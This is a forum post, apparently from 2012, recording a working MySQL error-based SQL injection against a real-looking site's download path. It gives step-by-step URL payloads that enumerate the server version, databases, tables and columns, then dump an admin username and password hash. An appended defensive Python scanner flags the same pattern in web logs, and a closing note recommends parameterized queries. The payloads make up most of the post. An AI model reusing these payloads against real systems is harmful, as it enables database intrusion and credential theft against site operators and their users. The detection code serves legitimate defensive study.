
PHP + MySQL advanced error-based injection, tested and confirmed working

Posted on 2012-9-13 17:52:09
http://www.wooyun.org/bugs/wooyun-2010-01666

I had been looking for something to test against and didn't expect to find one here; this is just a test and a record of it.

http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php

Or:

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/  leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********Enumerate database names one at a time with LIMIT**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********Enumerate table names one at a time with LIMIT**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********Enumerate column names one at a time with LIMIT**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 341 351 361

/**********Dump data**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
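
A defender-side check for the request pattern recorded in this post, added here as an example and not part of the original post: it URL-decodes request paths from a web access log and reports those that combine the count(*), floor(rand(0)*2), group by and information_schema constructs seen above. The log format, signature names, threshold, status codes and sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructs that together make up the duplicate-key error query in the post.
SIGNATURES = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I),
    "count_star": re.compile(r"count\s*\(\s*\*\s*\)", re.I),
    "group_by": re.compile(r"group\s+by", re.I),
    "info_schema": re.compile(r"information_schema\s*\.", re.I),
    "nested_select": re.compile(r"select\b.+\bfrom\s*\(\s*select", re.I | re.S),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def score_request(path):
    """Decode up to two layers of URL encoding, return sorted signature names found."""
    text = unquote_plus(unquote_plus(path))
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan(lines, threshold=3):
    """Return [(line_no, hits)]; one construct alone is common in benign traffic."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if m:
            hits = score_request(m.group(1))
            if len(hits) >= threshold:
                findings.append((no, hits))
    return findings

def _log(ip, path, status):
    # Constructed combined-log-style line; IPs are documentation addresses.
    return f'{ip} - - [13/Sep/2012:17:41:12 +0800] "GET {path} HTTP/1.1" {status} 512'

# Request path taken from the post (host omitted).
PROBE = ("/download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),"
         "concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables"
         "+group+by+x)a)%23/wapc/5000_0005_003")
SAMPLE_LOG = [
    _log("192.0.2.10", "/download/downpage/netarea/id/1600003/wapc/5000_0005_003", 200),
    _log("192.0.2.77", PROBE, 500),
    _log("192.0.2.10", "/search?q=group+by+department", 200),
    _log("192.0.2.10", "/report?fields=count(*)&sort=group+by+name", 200),
    _log("192.0.2.77", PROBE.replace("+", "%20"), 500),
]

if __name__ == "__main__":
    for no, hits in scan(SAMPLE_LOG):
        print(f"line {no}: possible error-based SQLi probe, matched {hits}")
```

Log matching only surfaces the probing; the fix is a parameterized query for the id path segment and not returning MySQL error text to the client.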
